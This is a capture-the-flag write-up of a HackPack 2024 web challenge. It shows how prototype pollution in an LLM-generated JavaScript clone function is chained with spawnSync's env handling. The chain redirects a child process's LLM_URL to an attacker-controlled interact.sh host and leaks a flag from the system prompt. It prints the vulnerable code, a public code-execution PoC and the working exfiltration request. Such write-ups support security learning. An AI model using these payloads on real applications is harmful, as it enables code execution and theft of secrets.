HackPack CTF 2024 LLM Edition - ask-me-anything
ask-me-a-question
This challenge was a WEB 450-point challenge of the HackPack 2024 CTF. The focus of this CTF was on exploiting LLM applications. However, this app could fit into most CTF formats, as the exploit itself is not really tied to LLMs.
In my opinion the challenge is well done. The vulnerability is anchored in a real-world scenario with plenty of research backing it up. The final payload is quite close to publicly available, copy-pastable payloads, but the CTF player still needs to understand the core of the vulnerability and make minor adjustments to get it to work.
Vulnerability Overview
The basics
The challenge environment consists of two parts: a Python FastAPI webserver, and a node.js server, which is the part we will focus on.
The web interface of the challenge provides very limited functionality. There is only one endpoint, /ask, which allows us to send prompts to the application.
A typical prompt looks like the following:
Request
POST /ask HTTP/1.1
Host: localhost:1338
Content-Length: 51
Api-UserAgent: frontend/0.1alpha
sec-ch-ua: "Chromium";v="123", "Not:A-Brand";v="8"
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Origin: http://localhost:1338
Referer: http://localhost:1338/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"prompt":{"role":"user","content":"What is HTML"}}
Response
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 13 Apr 2024 14:01:09 GMT
Content-Length: 1230
{"status":200,"message":"?\nAI: HTML is a markup language used to create content for the web. It stands for HyperText Markup Language.\nHuman: <snipped> each of these elements on the page.\nHuman: Wow, I had no idea! Can you teach me more about"}
The sink
Our goal is to get the flag. The flag hides within the defaultPrompt const, which retrieves it from an environment variable. In order to get the flag we need one of the following:
- Access to the prompts as they are sent to the LLM server (the app always sends all prompts to the server, but filters out the flag prompt)
- An LLM answer which reflects the system prompt (which contains the flag), or leaks the flag in its answer
- A way to retrieve the flag from the node.js environment
const defaultPrompt = [
    {"role": "system", "content": `Blah Blah Blah '${process.env['FLAG']}'. Blah Blah Blah. You are a chatbot named Aanya.`},
    {"role": "user", "content": "Introduce yourself"},
    {"role": "assistant", "content":"I'm Aanya, and I am a online chatbot."},
];
The most promising sink is in the llm.js file, which sends all prompts to a URL retrieved from an environment variable of the process.
const LLM_URL = process.env['LLM_URL']
const resp = await fetch(LLM_URL, {
    method: 'POST',
    body: JSON.stringify({
        'messages': prompts
    }),
    headers: {
        "Content-Type": "application/json",
    }
});
It must be noted that the llm.js file is executed by the node.js app server. As can be seen in the following code snippet, the server spawns a synchronous process (with spawnSync) using the following command line: node "llm.js" "system prompt with <flag>" "the other prompts".
function createArguments(fullPrompt) {
    let list = ['./llm.js', ];
    for(let i = 0; fullPrompt[i]; i++) {
        list.push(fullPrompt[i].role);
        list.push(fullPrompt[i].content);
    }
    return list;
}
const child = spawnSync('node', createArguments(allPrompt), { encoding: 'utf-8', stdio: 'pipe' });
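For illustration, with the defaultPrompt from above plus our validated user prompt, createArguments produces an argument list along these lines (flag placeholder, not the actual value):
[
    './llm.js',
    'system', "Blah Blah Blah '<FLAG>'. Blah Blah Blah. You are a chatbot named Aanya.",
    'user', 'Introduce yourself',
    'assistant', "I'm Aanya, and I am a online chatbot.",
    'user', 'What is HTML'
]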
Exploitation
We are very limited in what we can submit to the challenge. There are multiple “prompt injection” sanitization routines. The following code snippet highlights one of them. As can be seen, our “prompt request” may only carry the attribute role: user and must pass some additional input validation.
function checkPromptInjection(prompt) {
    if ( typeof prompt !== 'object' ) {
        throw Error('Incorrect format specified');
    }
    if ( prompt.role !== 'user' ) {
        throw Error('Incorrect user specified');
    }
    if ( !/^[a-zA-Z0-9 ]+$/.test(prompt.content) ) {
        throw Error('Prompt injection detected');
    }
    if ( prompt.content.length > 40 ) {
        throw Error('Prompt is greater than 40 characters.')
    }
    if ( !allowedPrompts.includes(prompt.content) ) {
        throw Error('Prompt injection detected')
    }
    const safePromptData = clone({}, prompt, 5);
    return safePromptData;
}
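Note what the routine does not check: it only inspects role and content, so any additional keys in the JSON body, such as __proto__, survive validation and reach the clone call. A sketch, assuming "What is HTML" is on the allowedPrompts whitelist:
// JSON.parse creates "__proto__" as an own, enumerable property,
// so it survives every check below untouched
const prompt = JSON.parse('{"role":"user","content":"What is HTML","__proto__":{"ppp":"testppp"}}');
// typeof prompt === 'object'              -> passes
// prompt.role === 'user'                  -> passes
// /^[a-zA-Z0-9 ]+$/.test(prompt.content)  -> passes (only content is tested)
// prompt.content.length <= 40             -> passes
// allowedPrompts.includes(prompt.content) -> passes (assumption)
const safePromptData = clone({}, prompt, 5); // the "__proto__" key rides along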
The previous sanitization routine also contains a potential indicator of a JavaScript prototype pollution vulnerability, namely the following line:
const safePromptData = clone({}, prompt, 5);
If we investigate the clone function, we find that
- it was created by a developer using an LLM prompt
- it recursively clones a JavaScript object
As this clone function is called on the attacker-controlled prompt object, we are able to manipulate the prototype of the app server and inject attacker-controlled properties into the environment.
“Prototype pollution vulnerabilities typically arise when a JavaScript function recursively merges an object containing user-controllable properties into an existing object.” (https://portswigger.net/web-security/prototype-pollution)
/*
Prompt:
Generate a JS Function that clones a javascript object,
make sure to handle nested objects and nested array properly.
Output (starts here):
This function 'clone' creates a deep copy of a given object.
It recursively iterates through the properties of the object,
copying each property into a new object. If a property is an object itself,
it recursively clones that object. If a property is an array, it creates
a shallow copy of the array. Finally, it returns the cloned object.
*/
function clone(target, obj, depth) {
    if ( depth === 0 ) {
        return {};
    }
    // Iterate through each key in the original object
    for (const key in obj) {
        // Convert string key to integer if it's numeric
        const numericKey = /^\d+$/.test(key) ? parseInt(key) : key;
        // Check if the value associated with the key is an object
        if (typeof obj[numericKey] === 'object') {
            if ( !target[numericKey] ) {
                target[numericKey] = {};
            }
            // If the value is an object, recursively clone it
            target[numericKey] = clone(target[numericKey], obj[numericKey], depth - 1);
        } else if (Array.isArray(obj[numericKey])) {
            // If the value is an array, create a copy of the array
            target[numericKey] = obj[numericKey].slice();
        } else {
            // Otherwise, directly assign the value to the cloned object
            target[numericKey] = obj[numericKey];
        }
    }
    // Return the cloned object
    return target;
}
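This is where the pollution happens: JSON.parse creates __proto__ as an own, enumerable property, so the for...in loop visits it. obj["__proto__"] is an object, target["__proto__"] resolves to Object.prototype (which is truthy, so it is not replaced by an empty object), and the recursion then copies our keys straight onto the global prototype. A minimal sketch using the clone function above:
// An attacker-controlled prompt as it arrives from the request body
const payload = JSON.parse('{"role":"user","content":"What is HTML","__proto__":{"ppp":"testppp"}}');
clone({}, payload, 5);
// clone() recursed with target = Object.prototype and wrote "ppp" onto it,
// so every object (and the global scope) now inherits the property:
console.log({}.ppp); // "testppp"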
“In practice, injecting a property called evilProperty is unlikely to have any effect. However, an attacker can use the same technique to pollute the prototype with properties that are used by the application, or any imported libraries.” (https://portswigger.net/web-security/prototype-pollution)
First we test our hypothesis that prototype pollution is possible. We inject a quick-and-dirty console.log(ppp). The property ppp does not exist yet, so we get an error:
const safePrompt = checkPromptInjection(prompt);
console.log("000:"+ ppp +"000end");
let allPrompt = [];
Then we inject the property through prototype pollution and check that everything works correctly. As we can see, we successfully injected the property ppp into the node.js __proto__.
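The request body for this test looks as follows:
{"prompt":{"role":"user","content":"What is HTML","__proto__":{"ppp":"testppp"}}}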
To exploit the prototype pollution we need to find a property which we can manipulate, which is not overwritten, and whose manipulation has a security-relevant side effect.
A popular prototype pollution sink is a call to spawnSync. The function reads certain options which, when not explicitly set by the developer, are controllable by the attacker via the polluted prototype.
// Prototype pollution due to `clone` function
const safePrompt = checkPromptInjection(prompt);

let allPrompt = [];
for(let i = 0; i < defaultPrompt.length; i++) {
    // Prototype pollution due to `clone` function
    allPrompt.push(clone({}, defaultPrompt[i], 5));
}

// pushing the following arguments onto a list: `llm.js` `system prompt` `assistant prompt` `user prompt`
allPrompt.push(safePrompt);

// Spawning the `llm.js` script with the command
// `node "llm.js" "system prompt" "assistant prompt"` ...
const child = spawnSync('node', createArguments(allPrompt), { encoding: 'utf-8', stdio: 'pipe' });
The following public PoC makes use of several properties which an attacker can control. While this PoC is a good indication of how to exploit our CTF challenge, it does not run out of the box.
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawnSync('something');
We can try to inject some properties from the PoC and observe different error messages (note that we inserted some custom console.log statements to surface the errors).
- If we inject a "shell":"/proc/self/exe" property, we get an error: the shell tries to invoke llm.js directly, without the node command.
- If we inject a non-existent shell, we can see how the process is spawned. Note that the prompt containing the “flag” is passed as an argument.
The PoC available on HackTricks expects the victim to call spawnSync without any additional arguments. Therefore we need to adjust the PoC.
- PoC expectation: spawnSync('node');
- Our CTF call: spawnSync('node', arguments);
Within the llm.js file we notice that the fetch call uses the variable LLM_URL to determine where to send our prompts. Normally LLM_URL points to the Python server which hosts the langchain HuggingFace API.
However, if we have a look at the top of the file, we notice that the script retrieves LLM_URL from the process environment.
// llm.js
const LLM_URL = process.env['LLM_URL']
const prompts = [];
[...]
const resp = await fetch(LLM_URL, {
    method: 'POST',
    body: JSON.stringify({
        'messages': prompts
    }),
    headers: {
        "Content-Type": "application/json",
    }
});
Knowing that LLM_URL is controlled by the process environment is great news. If we check the previous HackTricks PoC, we notice that it also utilises the env property to exploit spawnSync.
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}
If we have a look at the spawnSync call, we can also see that no explicit env is passed by the developer to the process. Let's attempt to overwrite the env of the llm.js process and control the LLM_URL.
For a successful exploit we first pollute the env property with an empty object, so that spawnSync no longer falls back to the real process environment (which contains the legitimate LLM_URL). Afterwards we pollute the LLM_URL property with our attacker-controlled URL.
When the process is spawned, spawnSync copies options.env into the child environment using a for...in loop, which deliberately includes inherited properties. Our polluted empty env object inherits LLM_URL from Object.prototype, so the child's environment ends up containing our attacker-controlled LLM_URL instead of the legitimate one. When llm.js then retrieves LLM_URL from its process environment, it receives our URL.
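A self-contained sketch of the gadget (assuming Node's spawnSync semantics; its env normalization even carries the source comment “Prototype values are intentionally included”):
const { spawnSync } = require('child_process');

// Simulate what the vulnerable clone() does for us
Object.prototype.env = {};                             // options.env now resolves to this object
Object.prototype.LLM_URL = 'http://attacker.example/'; // inherited by the empty env object

// No explicit env is passed, just like the challenge's spawnSync call
const child = spawnSync(process.execPath,
    ['-e', 'console.log(process.env.LLM_URL)'],
    { encoding: 'utf-8' });
console.log(child.stdout); // http://attacker.example/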
As a result, the fetch call in llm.js sends all prompts, including the system prompt with the flag, to our attacker-controlled interact.sh server.
POST /ask HTTP/1.1
Host: localhost:1338
Content-Length: 159
Api-UserAgent: frontend/0.1alpha
sec-ch-ua: "Chromium";v="123", "Not:A-Brand";v="8"
Content-Type: application/json
Connection: close
{"prompt":{"role":"user","content":"What is HTML",
"__proto__":{"ppp":"testppp","env":{},
"LLM_URL":"http://codpf2tu49utntqv3a6g4noqs6o3y6ijf.oast.pro/"}
}}
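On the interact.sh side we then receive the outgoing fetch from llm.js. Reconstructed from the code above (flag elided), the callback looks roughly like this:
POST / HTTP/1.1
Host: codpf2tu49utntqv3a6g4noqs6o3y6ijf.oast.pro
Content-Type: application/json

{"messages":[{"role":"system","content":"Blah Blah Blah '<FLAG>'. Blah Blah Blah. You are a chatbot named Aanya."},{"role":"user","content":"Introduce yourself"},{"role":"assistant","content":"I'm Aanya, and I am a online chatbot."},{"role":"user","content":"What is HTML"}]}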
The request body contains our flag and we successfully solved the CTF. Sadly, as you might have noticed in the timestamp, we solved the challenge 6 minutes too late and did not receive any points…